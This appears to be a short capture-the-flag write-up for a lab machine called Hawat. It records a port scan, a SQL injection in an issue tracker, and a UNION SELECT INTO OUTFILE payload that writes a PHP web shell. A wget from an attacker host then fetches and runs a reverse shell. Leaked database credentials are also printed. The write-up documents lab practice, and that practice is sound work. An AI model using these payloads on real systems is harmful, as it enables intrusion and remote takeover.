Hawat

Summary

Target exposed 3 different web apps on ports 17445, 30455, and 50080.
Source code of the Issue Tracker (port 17445) revealed a SQL injection vulnerability in the priority parameter.
Used SQLi to write a PHP web shell into the document root (discovered via phpinfo.php).
Triggered the shell to gain initial access to the system.
Used wget to upload a reverse shell and executed it for full command execution.

nmap -p- -T4 -vvv -Pn -oN nmap-all --max-retries 1 192.168.167.147

Open ports: 22, 17445, 30455, 50080

🔎 Web App (17445)

SQL Injection found in:

Strings query = "SELECT message FROM issue WHERE priority='"+priority+"'";

Credentials in source:

user: issue_user
pass: ManagementInsideOld797

🔎 Web App (30455)

🔎 Web App (50080)

Initial Foothold

Wrote Web Shell using SQL Injection

priority=Normal' UNION SELECT ('<?php echo exec($_GET["cmd"]);?>') INTO OUTFILE '/srv/http/cmd.php'; --

Executed commands via shell

curl "http://192.168.120.130:30455/cmd.php?cmd=id"

Uploaded reverse shell

wget http://192.168.118.3:443/rev.txt -O /srv/http/rev.php
curl http://192.168.120.130:30455/rev.php

✅ Shell access achieved!

Last updated 1 month ago

Was this helpful?

Target exposed 3 different web apps on ports 17445, 30455, and 50080.
Source code of the Issue Tracker (port 17445) revealed a SQL injection vulnerability in the priority parameter.
Used SQLi to write a PHP web shell into the document root (discovered via phpinfo.php).
Triggered the shell to gain initial access to the system.
Used wget to upload a reverse shell and executed it for full command execution.

nmap -p- -T4 -vvv -Pn -oN nmap-all --max-retries 1 192.168.167.147